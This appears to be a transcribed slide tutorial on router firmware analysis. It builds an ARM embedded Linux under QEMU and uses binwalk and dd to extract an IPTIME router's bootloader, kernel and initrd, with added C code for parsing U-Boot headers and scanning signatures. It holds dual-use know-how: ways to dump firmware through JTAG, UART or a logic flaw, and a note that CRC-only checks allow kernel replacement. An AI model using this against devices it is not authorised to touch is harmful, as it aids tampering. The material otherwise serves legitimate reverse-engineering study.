Home Router Hacking (wired/wireless router hacking) mongii@grayhash
Summary: obtaining a router firmware image and analysing its structure; understanding how an embedded system is built; extracting the router file system; running a virtual router system under QEMU; ARM assembly and exploitation.
Obtaining the IPTIME firmware: downloading the update file
Download the update file from http://iptime.com/iptime/?page_id=126
Ways to obtain a firmware image:
1. Download the firmware the vendor publishes
2. Extract it through a programming interface (ISP, ICSP)
3. Sniff the traffic while an automatic or manual update runs
4. Connect to the UART debug port, get a shell, and copy it out
5. Exploit a logic vulnerability to get shell access, then copy it out
6. Desolder the flash memory and dump it physically
7. Connect to the JTAG debug port and dump the firmware
Transferring the firmware file to the analysis host (WinSCP)
Firmware file analysis
root@ip-172-31-4-170:~/mongii/iptime# ls -al
total 1892
drwxr-xr-x  2 root root    4096 Jun 25 15:05 .
drwxr-xr-x 26 root root    4096 Jun 25 14:52 ..
-rw-r--r--  1 root root 1925312 Jun 25 14:47 g104_kr_7_60.bin
root@ip-172-31-4-170:~/mongii/iptime# file g104_kr_7_60.bin
g104_kr_7_60.bin: data
root@ip-172-31-4-170:~/mongii/iptime#
`file` only says "data": nothing at offset 0 matches a known magic, so the image has to be taken apart by hand or with a signature scanner such as binwalk.
Firmware analysis tools: file, strings, xxd, a hex editor, IDA, ...
Hands-on: building an embedded Linux
Structure of an embedded Linux system: bootloader, OS kernel, root file system
Exercise: build an ARM-based embedded Linux using a cross compiler; compile and boot the bootloader; compile and boot the Linux kernel; build and boot the root file system
What is cross compiling? Generating executable code for an architecture other than the one you compile on.
Examples: compiling x86 code on x86 => not a cross compiler; ARM code on ARM => not a cross compiler; ARM code on x86 => cross compiler; MIPS code on x86 => cross compiler. A cross compiler has to be installed.
Installing a cross compiler. Representative ARM cross compilers:
- distributed by CodeSourcery: http://sourcery.mentor.com/public/gnu_toolchain/arm-none-linux-gnueabi/
- distributed by Android (NDK): http://developer.android.com/tools/sdk/ndk/index.html
- distributed by uClibc: http://www.uclibc.org/downloads/binaries/
Installing the CodeSourcery cross compiler
http://sourcery.mentor.com/public/gnu_toolchain/arm-none-linux-gnueabi/arm-2014.05-29-arm-none-linux-gnueabi.bin
http://211.189.88.59/temp/arm-2014.05-29-arm-none-linux-gnueabi.bin
Installation:
apt-get install libgtk2.0-0:i386 libxtst6:i386 gtk2-engines-murrine:i386 lib32stdc++6 libxt6:i386 libdbus-glib-1-2:i386 libasound2:i386 unzip gcc
chmod +x arm-2014.05-29-arm-none-linux-gnueabi.bin
./arm-2014.05-29-arm-none-linux-gnueabi.bin
It installs under /root/MentorGraphics/. The installer fails under dash, so point /bin/sh at bash first: ln -sf /bin/bash /bin/sh (this replaces the system-wide /bin/sh; restore it with ln -sf /bin/dash /bin/sh once the installer has finished).
Installing the CodeSourcery cross compiler: keep pressing Enter or Y through the prompts.
Installation complete
root@ubuntu:~# cd /root/codesourcery/sourcery_codebench_lite_for_arm_gnu_linux/bin
root@ubuntu:~/codesourcery/sourcery_codebench_lite_for_arm_gnu_linux/bin# ./arm-none-linux-gnueabi-gcc
arm-none-linux-gnueabi-gcc: fatal error: no input files
compilation terminated.
Add the bin directory to PATH (and to /root/.bashrc so it persists):
export PATH=$PATH:/root/MentorGraphics/Sourcery_CodeBench_Lite_for_ARM_GNU_Linux/bin
Note: installing from apt-get instead: apt-get install build-essential; apt-get install gcc-arm-linux-gnueabihf. Caution: u-boot built with this cross compiler does not load correctly in QEMU (the gnueabihf toolchain defaults to ARMv7 hard-float code, while the Versatile PB emulated here has an ARMv5 ARM926EJ-S core).
BootLoader
Compiling the bootloader. What is a bootloader? The program that runs before the operating system: basic hardware setup; loading the OS kernel; reading and writing firmware and memory; firmware updates (network, serial, USB); multi-boot.
Representative bootloaders. Embedded: U-Boot, RedBoot, Netboot. General purpose: LILO, GRUB.
Installing U-Boot
# wget ftp://ftp.denx.de/pub/u-boot/u-boot-2010.03.tar.bz2
# bzip2 -d u-boot-2010.03.tar.bz2
# tar xvf u-boot-2010.03.tar
# cd u-boot-2010.03
# make versatilepb_config ARCH=arm CROSS_COMPILE=arm-none-linux-gnueabi-
# make all ARCH=arm CROSS_COMPILE=arm-none-linux-gnueabi-
Versatile? A widely used family of ARM development boards.
Boards supported by QEMU
# apt install qemu
# qemu-system-arm -M help
Supported machines are:
none                 empty machine
beagle               Beagle board (OMAP3530)
beaglexm             Beagle board XM (OMAP3630)
collie               Collie PDA (SA-1110)
nuri                 Samsung NURI board (Exynos4210)
smdkc210             Samsung SMDKC210 board (Exynos4210)
connex               Gumstix Connex (PXA255)
verdex               Gumstix Verdex (PXA270)
highbank             Calxeda Highbank (ECX-1000)
integratorcp         ARM Integrator/CP (ARM926EJ-S) (default)
kzm                  ARM KZM Emulation Baseboard (ARM1136)
mainstone            Mainstone II (PXA27x)
musicpal             Marvell 88w8618 / MusicPal (ARM926EJ-S)
n800                 Nokia N800 tablet aka. RX-34 (OMAP2420)
n810                 Nokia N810 tablet aka. RX-44 (OMAP2420)
Running U-Boot
root@ubuntu:~/uboot/u-boot-2010.03# qemu-system-arm -M versatilepb -m 128M -nographic -kernel u-boot.bin
pulseaudio: pa_context_connect() failed
pulseaudio: Reason: Connection refused
pulseaudio: Failed to initialize PA context
audio: Could not init `pa' audio driver
(the pulseaudio lines are harmless: there is no audio device to attach to)

U-Boot 2010.03 (Aug 20 2015 - 13:43:06)

DRAM:  0 kB
Flash: 64 MB
*** Warning - bad CRC, using default environment

In:    serial
Out:   serial
Err:   serial
Net:   SMC91111-0
VersatilePB # help
?       - alias for 'help'
base    - print or set address offset
bdinfo  - print Board Info structure
bootm   - boot application image from memory
bootp   - boot image via network using BOOTP/TFTP protocol
cmp     - memory compare
cp      - memory copy
crc32   - checksum calculation
dhcp    - boot image via network using DHCP/TFTP protocol
What is at address 0?
The U-Boot image in memory
Looking at the U-Boot file
Exiting QEMU: press Ctrl+a, release it, then press x.
Kernel
Compiling the Linux kernel: download the kernel source from https://www.kernel.org
https://cdn.kernel.org/pub/linux/kernel/v4.x/linux-4.1.6.tar.xz
root@ubuntu:~/linux_build# xz -d linux-4.1.6.tar.xz
root@ubuntu:~/linux_build# ls
linux-4.1.6.tar
root@ubuntu:~/linux_build# tar xvf linux-4.1.6.tar
Compiling the Linux kernel
# make ARCH=arm versatile_defconfig
# make ARCH=arm menuconfig    (needs: apt-get install lib32ncurses5 lib32ncurses5-dev bc)
  Kernel Features -> check that "Use the ARM EABI to compile the kernel" is enabled
# make ARCH=arm CROSS_COMPILE=arm-none-linux-gnueabi- all
# find . -name zImage
./arch/arm/boot/zImage
Structure of zImage (source: http://bmfrog.tistory.com/m/post/view/id/101)
Structure of zImage: vmlinux is the actual kernel; piggy.gz is vmlinux compressed; misc.c performs the decompression; head.S is the decompressor entry, which jumps to the decompressed kernel.
Kernel boot test: qemu-system-arm -M versatilepb -m 128M -kernel zImage -nographic -append "console=ttyAMA0,115200"
Bootloader + Kernel
vi include/configs/versatile.h
Before:
#define CONFIG_BOOTDELAY 2
#define CONFIG_BOOTARGS "root=/dev/nfs mem=128M ip=dhcp "\
    "netdev=25,0,0xf1010000,0xf1010010,eth0"
After (boot from a RAM disk instead of NFS):
#define CONFIG_BOOTDELAY 2
#define CONFIG_BOOTARGS "root=/dev/ram mem=128M console=ttyAMA0,115200"
#define CONFIG_INITRD_TAG 1
vi common/image.c
Before:
#if defined(CONFIG_B2) || defined(CONFIG_EVB4510) || defined(CONFIG_ARMADILLO)
	/*
	 * We need to copy the ramdisk to SRAM to let Linux boot
	 */
	if (rd_data) {
		memmove ((void *)rd_load, (uchar *)rd_data, rd_len);
		rd_data = rd_load;
	}
#endif
After (add the Versatile board so its ramdisk is also copied to the load address):
#if defined(CONFIG_B2) || defined(CONFIG_EVB4510) || defined(CONFIG_ARMADILLO) || defined(CONFIG_VERSATILE)
	/*
	 * We need to copy the ramdisk to SRAM to let Linux boot
	 */
	if (rd_data) {
		memmove ((void *)rd_load, (uchar *)rd_data, rd_len);
		rd_data = rd_load;
	}
#endif
Recompile U-Boot and generate the U-Boot image.
Bootloader + kernel boot succeeded
qemu-system-arm -M versatilepb -m 128M -kernel flash.bin -nographic
VersatilePB # bootm 0x210000
(flash.bin is the concatenated U-Boot + uImage file built with dd and mkimage in the Bootloader + Kernel + RFS section; QEMU loads it at 0x00010000, so the kernel image written at the 2M offset sits at 0x210000.)
Root File System
What is a root file system? The files you meet once the kernel has finished booting: the OS interface (shell, X Window System); basic programs (login, passwd, ls, id, ps, netstat, ...); libraries (glibc, ...).
BusyBox: many utilities and programs combined into one package; shared code is deduplicated to minimise size; widely used in embedded operating systems. Download: http://busybox.net/downloads/busybox-1.21.1.tar.bz2
Compiling BusyBox
make ARCH=arm CROSS_COMPILE=arm-none-linux-gnueabi- defconfig
make ARCH=arm CROSS_COMPILE=arm-none-linux-gnueabi- menuconfig
  Before building, change: Busybox Settings -> Build Options -> enable "Build BusyBox as a static binary"
make ARCH=arm CROSS_COMPILE=arm-none-linux-gnueabi- install
Creating the basic file system
# cd _install/
# find . | cpio -o --format=newc > ../rootfs.img
3994 blocks
# gzip -c ../rootfs.img > rootfs.img.gz
# cp /root/linux-4.1.6/arch/arm/boot/zImage .
Kernel + RFS boot test
qemu-system-arm -M versatilepb -m 128M -kernel zImage -initrd rootfs.img.gz -append "root=/dev/ram rdinit=/bin/sh console=ttyAMA0,115200" -nographic
Enabling the network
/ # ifconfig eth0 10.0.2.15 netmask 255.255.255.0
/ # route add default gw 10.0.2.2
/ # ifconfig
ifconfig: /proc/net/dev: No such file or directory
eth0      Link encap:Ethernet  HWaddr 52:54:00:12:34:56
          inet addr:10.0.2.15  Bcast:10.0.2.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          Interrupt:57 Base address:0x8000 DMA chan:ff
/ # telnet 211.189.88.59 80
HEAD / HTTP/1.0

HTTP/1.1 200 OK
Date: Sat, 12 Aug 2017 14:55:10 GMT
Server: Apache/2.2.22 (EL)
X-Powered-By: PHP/5.2.17
Connection: close
Content-Type: text/html; charset=euc_kr

Connection closed by foreign host
/ #
(10.0.2.15 and the gateway 10.0.2.2 are QEMU's user-mode networking defaults; the /proc/net/dev error only means procfs is not mounted yet: mount -t proc proc /proc.)
Bootloader + Kernel + RFS boot
uboot/include/configs/versatile.h:
#define CONFIG_BOOTDELAY 2
#define CONFIG_BOOTARGS "root=/dev/ram rdinit=/bin/sh mem=128M console=ttyAMA0,115200"
#define CONFIG_INITRD_TAG 1
$ make all ARCH=arm CROSS_COMPILE=arm-none-linux-gnueabi-
$ dd if=/dev/zero of=flash.bin bs=1 count=7M
$ dd if=u-boot.bin of=flash.bin conv=notrunc bs=1
$ mkimage -A arm -C none -O linux -T kernel -d zImage -a 0x00010000 -e 0x00010000 zImage.uimg
$ dd if=zImage.uimg of=flash.bin conv=notrunc bs=1 seek=2M
$ mkimage -A arm -C none -O linux -T ramdisk -d rootfs.img.gz -a 0x00800000 -e 0x00800000 rootfs.uimg
$ dd if=rootfs.uimg of=flash.bin conv=notrunc bs=1 seek=5M
Bootloader + Kernel + RFS boot
qemu-system-arm -M versatilepb -m 128M -kernel flash.bin -nographic
VersatilePB # bootm 0x210000 0x510000
(QEMU loads flash.bin at 0x00010000: 0x10000 + 2M = 0x210000 is the kernel uImage and 0x10000 + 5M = 0x510000 the ramdisk uImage.)
Automatic boot: add a boot command to uboot/include/configs/versatile.h, then rebuild U-Boot and flash.bin exactly as above:
#define CONFIG_BOOTDELAY 2
#define CONFIG_BOOTARGS "root=/dev/ram rdinit=/bin/sh mem=128M console=ttyAMA0,115200"
#define CONFIG_INITRD_TAG 1
#define CONFIG_BOOTCOMMAND "bootm 0x210000 0x510000"
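Added example (not from the slides): the flash.bin assembled above is three pieces glued together with dd, and bootm only finds the kernel and ramdisk because their U-Boot legacy headers (the 64-byte structure mkimage writes: magic 0x27051956, CRC-32 over header and payload, big-endian load and entry addresses) sit at the 2M and 5M offsets, which become 0x210000 and 0x510000 because QEMU loads a raw -kernel file at physical 0x00010000 on versatilepb (an assumption the slides' addresses rely on). The C below builds, parses and CRC-checks such headers over a constructed stand-in for flash.bin; the image names and payload bytes are made up for the example. Worth remembering: the CRC that bootm's "Verifying Checksum" reports is an integrity check, not a signature, so anyone who can write the flash or the update image can replace the kernel and it will still say OK.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define IH_MAGIC        0x27051956u      /* U-Boot legacy image magic */
#define IH_NMLEN        32
#define IH_HDR_LEN      64
#define IH_OS_LINUX     5
#define IH_ARCH_ARM     2
#define IH_TYPE_KERNEL  2
#define IH_TYPE_RAMDISK 3
#define IH_COMP_NONE    0
/* byte offsets of the big-endian header fields */
enum { OFF_MAGIC = 0, OFF_HCRC = 4, OFF_TIME = 8, OFF_SIZE = 12, OFF_LOAD = 16,
       OFF_EP = 20, OFF_DCRC = 24, OFF_OS = 28, OFF_ARCH = 29, OFF_TYPE = 30,
       OFF_COMP = 31, OFF_NAME = 32 };

/* zlib-compatible CRC-32, the checksum mkimage writes and bootm verifies */
static uint32_t crc32_buf(const uint8_t *p, size_t n)
{
    uint32_t c = 0xFFFFFFFFu;
    for (size_t i = 0; i < n; i++) {
        c ^= p[i];
        for (int k = 0; k < 8; k++)
            c = (c >> 1) ^ (0xEDB88320u & (0u - (c & 1u)));
    }
    return c ^ 0xFFFFFFFFu;
}

static void put_be32(uint8_t *p, uint32_t v)
{
    p[0] = (uint8_t)(v >> 24); p[1] = (uint8_t)(v >> 16); p[2] = (uint8_t)(v >> 8); p[3] = (uint8_t)v;
}
static uint32_t get_be32(const uint8_t *p)
{
    return (uint32_t)p[0] << 24 | (uint32_t)p[1] << 16 | (uint32_t)p[2] << 8 | p[3];
}

/* Write the header that mkimage -A arm -O linux -C none -T <type> -a load -e ep
 * produces for `payload` (the build timestamp is fixed at 0 here). */
static void make_uimage_header(uint8_t *hdr, const uint8_t *payload, uint32_t size,
                               uint32_t load, uint32_t ep, uint8_t type, const char *name)
{
    size_t nl = strlen(name);
    memset(hdr, 0, IH_HDR_LEN);
    put_be32(hdr + OFF_MAGIC, IH_MAGIC);
    put_be32(hdr + OFF_SIZE, size);
    put_be32(hdr + OFF_LOAD, load);
    put_be32(hdr + OFF_EP, ep);
    put_be32(hdr + OFF_DCRC, crc32_buf(payload, size));
    hdr[OFF_OS] = IH_OS_LINUX; hdr[OFF_ARCH] = IH_ARCH_ARM;
    hdr[OFF_TYPE] = type;      hdr[OFF_COMP] = IH_COMP_NONE;
    memcpy(hdr + OFF_NAME, name, nl > IH_NMLEN ? IH_NMLEN : nl);
    put_be32(hdr + OFF_HCRC, crc32_buf(hdr, IH_HDR_LEN));  /* hcrc is computed with its own field zeroed */
}

struct uimage_info { uint32_t size, load, ep; uint8_t type; char name[IH_NMLEN + 1]; };

/* Parse the header at img+off. Returns 1 only if magic and header CRC are good. */
static int parse_uimage(const uint8_t *img, size_t len, size_t off, struct uimage_info *out)
{
    uint8_t tmp[IH_HDR_LEN];
    if (off + IH_HDR_LEN > len || get_be32(img + off + OFF_MAGIC) != IH_MAGIC) return 0;
    memcpy(tmp, img + off, IH_HDR_LEN);
    put_be32(tmp + OFF_HCRC, 0);
    if (crc32_buf(tmp, IH_HDR_LEN) != get_be32(img + off + OFF_HCRC)) return 0;
    out->size = get_be32(img + off + OFF_SIZE);
    out->load = get_be32(img + off + OFF_LOAD);
    out->ep   = get_be32(img + off + OFF_EP);
    out->type = img[off + OFF_TYPE];
    memcpy(out->name, img + off + OFF_NAME, IH_NMLEN);
    out->name[IH_NMLEN] = '\0';
    return 1;
}

/* The payload check bootm performs before "Verifying Checksum ... OK".
 * CRC-32 detects corruption only; it does not authenticate the image. */
static int verify_uimage_data(const uint8_t *img, size_t len, size_t off)
{
    struct uimage_info info;
    if (!parse_uimage(img, len, off, &info) || off + IH_HDR_LEN + info.size > len) return 0;
    return crc32_buf(img + off + IH_HDR_LEN, info.size) == get_be32(img + off + OFF_DCRC);
}

/* Address to give bootm: QEMU places flash.bin at ram_base (0x00010000 on
 * versatilepb), so an image dd'ed in at byte offset `seek` lives at ram_base + seek. */
static uint32_t bootm_addr(uint32_t ram_base, uint32_t seek) { return ram_base + seek; }

/* Constructed stand-in for flash.bin: 7 MiB of zeros with a fake zImage uImage at
 * 2M and a fake ramdisk uImage at 5M (U-Boot itself would occupy offset 0). */
static uint8_t *build_sample_flash(size_t *len)
{
    static uint8_t kern[1024], rd[2048];
    uint8_t *f;
    *len = 7u << 20;
    if (!(f = calloc(*len, 1))) return NULL;
    for (size_t i = 0; i < sizeof kern; i++) kern[i] = (uint8_t)(i * 7);
    for (size_t i = 0; i < sizeof rd; i++)   rd[i]   = (uint8_t)(i ^ 0x5a);
    make_uimage_header(f + (2u << 20), kern, sizeof kern, 0x00010000, 0x00010000, IH_TYPE_KERNEL, "zImage");
    memcpy(f + (2u << 20) + IH_HDR_LEN, kern, sizeof kern);
    make_uimage_header(f + (5u << 20), rd, sizeof rd, 0x00800000, 0x00800000, IH_TYPE_RAMDISK, "rootfs");
    memcpy(f + (5u << 20) + IH_HDR_LEN, rd, sizeof rd);
    return f;
}

int main(void)
{
    size_t len, offs[2] = { 2u << 20, 5u << 20 };
    uint8_t *f = build_sample_flash(&len);
    for (int i = 0; i < 2; i++) {
        struct uimage_info u;
        if (parse_uimage(f, len, offs[i], &u))
            printf("bootm 0x%X: %-8s type=%u load=0x%08X ep=0x%08X size=%u data-crc %s\n",
                   bootm_addr(0x10000, (uint32_t)offs[i]), u.name, (unsigned)u.type, u.load, u.ep, u.size,
                   verify_uimage_data(f, len, offs[i]) ? "OK" : "BAD");
    }
    free(f);
    return 0;
}
```

To check a real flash.bin, read the file into a buffer and call parse_uimage at 2M and 5M; the load and entry fields should come back as 0x00010000 and 0x00800000, matching the -a/-e arguments given to mkimage.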
What is a Linux distribution? Different root file systems and interfaces built on top of the same base kernel make different distributions: Ubuntu Linux, Fedora Linux, Android Linux.
Putting Android on QEMU: http://blackzaket.blog.me/80100937415 and http://www.kandroid.org/board/board.php?board=androidporting&sort=hit&shwhere=subject&command=body&no=240
Putting it on real hardware: http://www.arm.com/products/tools/development-boards/versatile/platform-baseboards.php
Putting it on real hardware: a ROM writer (a dedicated programming device) writes to the flash memory; a JTAG hardware debugger can also write to the flash memory.
Analysing the router firmware
Structure of an embedded Linux system (recap): bootloader, OS kernel, root file system
Automatic firmware analysis tools
Binwalk (Firmware Analysis Tool): analyses what a firmware file is made of. Principle: signature search, e.g. a squashfs superblock starts with "hsqs". http://binwalk.org/ (apt-get install binwalk)
FMK (Firmware Mod Kit): extracts the files inside a firmware image, or builds a new firmware from modified files. https://code.google.com/p/firmware-mod-kit/
binwalk
root@ip-172-31-4-170:~/mongii/iptime# binwalk g104_kr_7_60.bin

DECIMAL     HEX         DESCRIPTION
-------------------------------------------------------------------------------------------------------
65592       0x10038     gzip compressed data, was "i.tmp", from Unix, last modified: Tue Apr 12 07:55:31 2011
720896      0xB0000     Squashfs filesystem, little endian, version 3.0, size: 1201395 bytes, 243 inodes, blocksize: 65536 bytes, created: Tue Apr 12 07:55:31 2011
root@ip-172-31-4-170:~/mongii/iptime#
Bootloader analysis
Re-checking the binwalk output
root@ip-172-31-4-170:~/mongii/iptime# binwalk g104_kr_7_60.bin

DECIMAL     HEX         DESCRIPTION
-------------------------------------------------------------------------------------------------------
65592       0x10038     gzip compressed data, was "i.tmp", from Unix, last modified: Tue Apr 12 07:55:31 2011
720896      0xB0000     Squashfs filesystem, little endian, version 3.0, size: 1201395 bytes, 243 inodes, blocksize: 65536 bytes, created: Tue Apr 12 07:55:31 2011
root@ip-172-31-4-170:~/mongii/iptime#
* The first hit being at offset 65592 means there is something else in front of it.
The start of the firmware
Bootloader analysis
root@ip-172-31-4-170:~/mongii/iptime# dd if=./g104_kr_7_60.bin of=./bootloader count=65592 bs=1
65592+0 records in
65592+0 records out
65592 bytes (66 kB) copied, 0.07132 s, 920 kB/s
root@ip-172-31-4-170:~/mongii/iptime# xxd bootloader
0000000: d7f0 29e3 01d4 a0e3 dbf0 29e3 dcd1 9fe5  ..)...)...
0000010: d2f0 29e3 d8d1 9fe5 d841 9fe5 0159 a0e3  ..)...A...Y..
0000020: 0450 85e0 d081 9fe5 0080 85e5 cc51 9fe5  .P.......Q..
0000030: 0450 85e0 c881 9fe5 0080 85e5 c451 9fe5  .P.......Q..
...
000fff0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
0010000: 6731 3034 0000 0000 372e 3630 0000 0000  g104....7.60....
0010010: 5475 6520 4170 7220 3132 2031 363a 3535  Tue Apr 12 16:55
0010020: 3a33 3120 3230 3131 0a00 0000 0000 0b00  :31 2011........
0010030: c85f 1c00 b1f0 860e                      ._......
root@ip-172-31-4-170:~/mongii/iptime#
The first 64 KB (0x0-0xFFFF) is the bootloader proper. Read as little-endian ARM words the opening bytes are code: e329f0d7 is msr CPSR_fc, #0xd7 and e3a0d401 is mov sp, #0x1000000, followed by more msr/ldr sp pairs, i.e. the per-mode stack setup found at a bootloader's entry point. At 0x10000 a small header follows: model "g104", version "7.60", build date "Tue Apr 12 16:55:31 2011" and a few words the slides do not decode. The gzip member binwalk reported at 0x10038 begins immediately after, so this header is 0x38 bytes long.
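As an added example (not from the slides): a small C program that does what the slides describe binwalk doing, walking the file byte by byte looking for known magic values, and that also reads the model, version and build-date strings visible in the hexdump at 0x10000. The 0x38-byte header layout (two 8-byte string fields, then a NUL-terminated date) is an assumption read off that hexdump, not a documented IPTIME format, and the remaining words are deliberately not interpreted. The sample image is constructed in code; passing a real firmware path as the first argument scans that file instead.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

struct sig { const char *name; const uint8_t *magic; size_t len; };

static const uint8_t MAGIC_GZIP[]    = { 0x1f, 0x8b, 0x08 };        /* gzip, deflate method */
static const uint8_t MAGIC_SQSH_LE[] = { 'h', 's', 'q', 's' };      /* squashfs, little-endian */
static const uint8_t MAGIC_SQSH_BE[] = { 's', 'q', 's', 'h' };      /* squashfs, big-endian */
static const uint8_t MAGIC_UIMAGE[]  = { 0x27, 0x05, 0x19, 0x56 };  /* U-Boot legacy image */

static const struct sig SIGS[] = {
    { "gzip compressed data", MAGIC_GZIP,    sizeof MAGIC_GZIP },
    { "Squashfs (LE)",        MAGIC_SQSH_LE, sizeof MAGIC_SQSH_LE },
    { "Squashfs (BE)",        MAGIC_SQSH_BE, sizeof MAGIC_SQSH_BE },
    { "uImage",               MAGIC_UIMAGE,  sizeof MAGIC_UIMAGE },
};

struct hit { size_t off; const char *name; };

/* Try every signature at every byte offset (binwalk's default alignment is 1)
 * and record the first match per offset. Returns the number of hits stored. */
static size_t scan_signatures(const uint8_t *buf, size_t len, struct hit *out, size_t max)
{
    size_t n = 0;
    for (size_t off = 0; off < len && n < max; off++) {
        for (size_t s = 0; s < sizeof SIGS / sizeof SIGS[0]; s++) {
            if (len - off >= SIGS[s].len && memcmp(buf + off, SIGS[s].magic, SIGS[s].len) == 0) {
                out[n].off = off; out[n].name = SIGS[s].name; n++;
                break;
            }
        }
    }
    return n;
}

/* IPTIME header as seen in the hexdump at 0x10000: model, version, build date.
 * ASSUMED layout: two 8-byte fields, then a NUL-terminated date; 0x38 bytes in
 * total because binwalk found the gzip member at 0x10038. The trailing words
 * (0x0b00..., 0x001c5fc8, 0x0e86f0b1) are left alone: the slides do not decode them. */
#define IPTIME_HDR_OFF 0x10000u
#define IPTIME_HDR_LEN 0x38u

struct iptime_hdr { char model[9]; char version[9]; char build_date[33]; };

static int parse_iptime_header(const uint8_t *buf, size_t len, struct iptime_hdr *h)
{
    const uint8_t *p = buf + IPTIME_HDR_OFF;
    size_t dl;
    if (len < IPTIME_HDR_OFF + IPTIME_HDR_LEN) return -1;
    memcpy(h->model, p, 8);            h->model[8] = '\0';
    memcpy(h->version, p + 8, 8);      h->version[8] = '\0';
    memcpy(h->build_date, p + 16, 32); h->build_date[32] = '\0';
    dl = strlen(h->build_date);
    if (dl && h->build_date[dl - 1] == '\n') h->build_date[dl - 1] = '\0';  /* the dump shows a trailing newline */
    return 0;
}

/* Constructed miniature of g104_kr_7_60.bin: zeros where the bootloader would be,
 * the header at 0x10000, gzip magic at 0x10038 and a squashfs magic a little
 * further on (in the real file it is at 0xB0000). */
static uint8_t *build_sample_image(size_t *len)
{
    uint8_t *buf;
    *len = IPTIME_HDR_OFF + 0x100;
    if (!(buf = calloc(*len, 1))) return NULL;
    memcpy(buf + IPTIME_HDR_OFF, "g104\0\0\0\0" "7.60\0\0\0\0" "Tue Apr 12 16:55:31 2011\n", 41);
    memcpy(buf + IPTIME_HDR_OFF + IPTIME_HDR_LEN, MAGIC_GZIP, sizeof MAGIC_GZIP);
    memcpy(buf + IPTIME_HDR_OFF + 0xc0, MAGIC_SQSH_LE, sizeof MAGIC_SQSH_LE);
    return buf;
}

int main(int argc, char **argv)
{
    size_t len = 0;
    uint8_t *img = NULL;
    if (argc > 1) {                       /* scan a real firmware file if one is given */
        FILE *fp = fopen(argv[1], "rb");
        if (!fp) { perror(argv[1]); return 1; }
        fseek(fp, 0, SEEK_END); len = (size_t)ftell(fp); rewind(fp);
        img = malloc(len);
        if (!img || fread(img, 1, len, fp) != len) { fclose(fp); return 1; }
        fclose(fp);
    } else {
        img = build_sample_image(&len);
    }
    struct hit hits[16];
    size_t n = scan_signatures(img, len, hits, 16);
    struct iptime_hdr h;
    printf("DECIMAL     HEX         DESCRIPTION\n");
    for (size_t i = 0; i < n; i++)
        printf("%-11zu 0x%-9zX %s\n", hits[i].off, hits[i].off, hits[i].name);
    if (parse_iptime_header(img, len, &h) == 0)
        printf("header@0x10000: model=%s version=%s built=%s\n", h.model, h.version, h.build_date);
    free(img);
    return 0;
}
```

Run against the real g104_kr_7_60.bin this reproduces the 0x10038 and 0xB0000 hits. A three-byte gzip magic will occasionally match inside compressed data; binwalk reduces such false positives by parsing the rest of the header (that is where the "i.tmp" file name and the timestamp in its output come from), which is the check to add before trusting a hit.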
Checking the bootloader in IDA
Kernel analysis
Structure of the kernel image (source: http://bmfrog.tistory.com/m/post/view/id/101)
Re-checking the binwalk output: the kernel image is the gzip member at 65592 (0x10038).
Extraction
root@ip-172-31-4-170:~/mongii/iptime# dd skip=65592 if=./g104_kr_7_60.bin of=./i.tmp.gz bs=1
1859720+0 records in
1859720+0 records out
1859720 bytes (1.9 MB) copied, 2.05117 s, 907 kB/s
root@ip-172-31-4-170:~/mongii/iptime# file i.tmp.gz
i.tmp.gz: gzip compressed data, was "i.tmp", from Unix, last modified: Tue Apr 12 07:55:31 2011
root@ip-172-31-4-170:~/mongii/iptime# ls -al
total 3780
drwxr-xr-x  2 root root    4096 Jun 25 15:11 .
drwxr-xr-x 26 root root    4096 Jun 25 14:52 ..
-rw-r--r--  1 root root   65592 Jun 25 15:09 bootloader
-rw-r--r--  1 root root 1925312 Jun 25 14:47 g104_kr_7_60.bin
-rw-r--r--  1 root root 1859720 Jun 25 15:11 i.tmp.gz
root@ip-172-31-4-170:~/mongii/iptime#
(dd with skip and no count copies to the end of the file, so i.tmp.gz also contains the squashfs that follows the gzip member; gzip ignores the trailing data.)
-e : extraction
root@ubuntu:~/iptime_firmware# binwalk --help

Binwalk v1.0
Craig Heffner, http://www.devttys0.com

Usage: binwalk [OPTIONS] [FILE1] [FILE2] [FILE3] ...

        -o, --offset=<int>            Start scan at this file offset
        -l, --length=<int>            Number of bytes to scan
        -b, --align=<int>             Set byte alignment [default: 1]
        -m, --magic=<file>            Specify an alternate magic file to use
        -i, --include=<filter>        Include matches that are normally excluded and that have <filter> in their description
        -x, --exclude=<filter>        Exclude matches that have <filter> in their description
        -y, --search=<filter>         Only search for matches that have <filter> in their description
        -g, --grep=<text>             Grep results for the specified text
        -R, --raw-bytes=<string>      Search for a sequence of raw bytes instead of using the default magic signatures
        -f, --file=<file>             Log results to file
        -D, --dd=<type:ext[:cmd]>     Extract entries whose descriptions match <type>, give them file extension <ext>, and execute <cmd>
        -e, --extract=[file]          Automatically extract known file types. Load rules from file, if specified.
        -r, --rm                      Cleanup extracted files and zero-size files
        -d, --delay                   Delay file extraction for files with known footers
        -a, --all                     Include all short signatures
        -I, --show-invalid            Show results marked as invalid
        -A, --opcodes                 Scan for executable code
        -C, --cast                    Cast file contents as various data types
        -k, --keep-going              Show all matching results at a given offset, not just the first one
        -q, --quiet                   Supress output to stdout
        -v, --verbose                 Be verbose (specify twice for very verbose)
        -u, --update                  Update magic signature files
        -h, --help                    Show help output

root@ubuntu:~/iptime_firmware#
Analysing i.tmp.gz
Analysing i.tmp.gz: gzip file format reference http://andromedarabbit.net/project/zip/gzipfileformat.html
gzip -d i.tmp.gz, then analyse i.tmp
Checking strings: the strings show that gzip decompression code is embedded (the kernel's misc.c, i.e. the zImage self-decompressor).
Deleting the bytes assumed to be a header
Checking in IDA: the piggy.gz decompression code
Structure of i.tmp
root@ip-172-31-4-170:~/mongii/iptime# binwalk i.tmp

DECIMAL     HEX         DESCRIPTION
-------------------------------------------------------------------------------------------------------
11936       0x2EA0      gzip compressed data, from Unix, last modified: Thu Apr 15 01:49:36 2010, max compression
655664      0xA0130     gzip compressed data, was "initrd", from Unix, last modified: Tue Apr 12 07:55:27 2011, max compression
root@ip-172-31-4-170:~/mongii/iptime#
Structure of i.tmp: the image file used by the IPTIME bootloader. It contains the kernel (the gzip member at 0x2EA0 is piggy.gz, the compressed vmlinux) and the initrd (the gzip member at 0xA0130).
Extracting the root file system files
Extracting the initrd
binwalk -e i.tmp
# file initrd
initrd: Linux rev 1.0 ext2 filesystem data (mounted or unclean), UUID=fbc0cc35-5c72-4ef0-bc05-5d6b9bdc8e50
mkdir FILE_SYSTEM
